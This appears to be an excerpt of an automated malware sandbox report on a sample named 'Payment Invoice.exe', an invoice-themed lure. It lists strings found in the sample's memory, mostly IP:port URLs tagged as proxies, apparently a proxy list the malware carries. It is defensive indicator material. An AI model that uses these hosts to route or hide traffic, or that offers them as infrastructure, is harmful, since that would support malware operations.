                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://85.117.60.162:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163168B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://85.120.30.66:33590
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163168B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://85.120.30.66:33590://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://85.172.0.30:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://85.172.0.30:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://85.193.93.73:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://85.193.93.73:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://85.196.179.34:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://85.196.179.34:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://85.214.107.177://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://85.214.107.177:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://85.214.107.177H
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.00000163169B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://85.214.94.28:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://85.214.94.28:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://85.235.184.186:3129
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://85.235.184.186:3129://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://85.239.121.168:4145
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://85.239.121.168:4145://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://85.25.177.5
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://85.25.177.53:55217
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://85.25.177.53:55217://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://85.25.177.53:58851
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://85.25.177.53:58851://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://85.31.234.252
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://85.31.234.252://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://85.31.234.252:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://85.62.218.250:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://85.62.218.250:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://85.94.24.29:1488
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://85.94.24.29:1488://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://86.107.178.103:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://86.107.178.103:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://86.107.178.109:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://86.107.178.109:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://86.107.179.234:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://86.107.179.234:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://86.107.179.244:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://86.107.179.244:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://86.110.189.118:42539
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://86.110.189.118:42539://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://86.110.27.165:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163183DB000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://86.52.40.119:8081
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163183E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://86.52.40.119:8081://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://87.103.133.243:4444
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://87.103.133.243:4444://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://87.255.200.108:60080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://87.255.200.108:60080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://87.76.1.251:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://87.76.1.251:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://88.119.139.237:53281
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://88.119.139.237:53281://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://88.202.230.103:13638
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://88.202.230.103:13638://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://88.202.230.103:17045
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://88.202.230.103:17045://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://88.204.216.142:36120
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://88.204.216.142:36120://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://88.211.85.169:42931
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://88.211.85.169:42931://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://88.250.60.33:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://88.250.60.33:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://88.255.102.105:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://88.255.102.105:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://88.255.217.57:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://88.255.217.57:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://88.51.214.182
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://88.51.214.182://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://88.51.214.182:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://88.80.148.190:9876
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://88.80.148.190:9876://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://88.84.62.5:4153
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://88.84.62.5:4153://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://88.99.10.252:1080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://88.99.10.252:1080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EA9000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://88.99.138.21:5088
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://88.99.138.21:5088://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://88.99.148.60:8111
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://88.99.148.60:8111://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://89.116.34.113
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318459000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://89.116.34.113://proxyx
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://89.116.34.113:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://89.135.59.65:8090
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://89.135.59.65:8090://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://89.163.157.129
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://89.163.157.129://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://89.163.157.129:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://89.171.116.65:65000
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://89.171.116.65:65000://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://89.187.216.58:1080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://89.187.216.58:1080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://89.230.92.9:8090
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://89.230.92.9:8090://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://89.248.204.178:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://89.248.204.178:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://89.31.143.12
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://89.31.143.12://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://89.31.143.12:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://89.34.198.253:5678
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316854000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://89.34.198.253:5678://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://89.36.114.38
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://89.36.114.38://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://89.36.114.38:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://90.188.250.16
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://90.188.250.16:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://90.74.184.32:999
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://90.74.184.32:999://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.107.180.250
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.107.180.250://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.107.180.250:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.134.140.
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.134.140.160:11946
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.134.140.160:11946://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.134.140.160:12217
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.134.140.160:12217://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.00000163169B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.134.140.160:20896
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.134.140.160:20896://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.134.140.160:2572
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.134.140.160:2572://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.000001631841E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.134.140.160:27207
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.134.140.160:27207://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.134.140.160:32588
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.134.140.160:32588://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.134.140.160:32896
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.134.140.160:32896://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.134.140.160:53012
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.134.140.160:53012://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.134.140.160:8879
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.134.140.160:8879://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.136.142.153:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.136.142.153:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.142.222.84:22735
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.142.222.84:22735://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.148.127.162:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.148.127.162:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.151.90.9
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.151.90.9://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.151.90.9:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.185.236.239:4145
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.185.236.239:4145://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317066000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.187.120.12:5678://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163167E8000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016316823000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.187.55.39:5678
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163167E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.187.55.39:5678://proxy8
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.189.177.186:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.189.177.186:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.189.177.188:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.189.177.188:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.199.93.32:4153
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.199.93.32:4153://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.202.230.219:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.202.230.219:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163169B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.213.119.246:31551
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163169B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.213.119.246:31551://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.214.31.234:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.214.31.234:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.220.69.43:3629
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.220.69.43:3629://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.220.69.43:3629p
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.231.186.133:443
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.231.186.133:443://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.233.223.147:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.233.223.147:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.236.156.30:8282
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.236.156.30:8282://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.241.217.58:9090
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.241.217.58:9090://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317D92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.247.92.63:5678
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317D92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.247.92.63:5678://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.65.102.60
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.65.102.60://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.65.102.60:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.92.78.207:4145
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.92.78.207:4145://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.118.132.125:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.118.132.125:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319C07000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016319696000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.204.134.38:1555
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163196BB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.204.134.38:1555://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.204.134.38:25675
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.204.134.38:25675://proxy
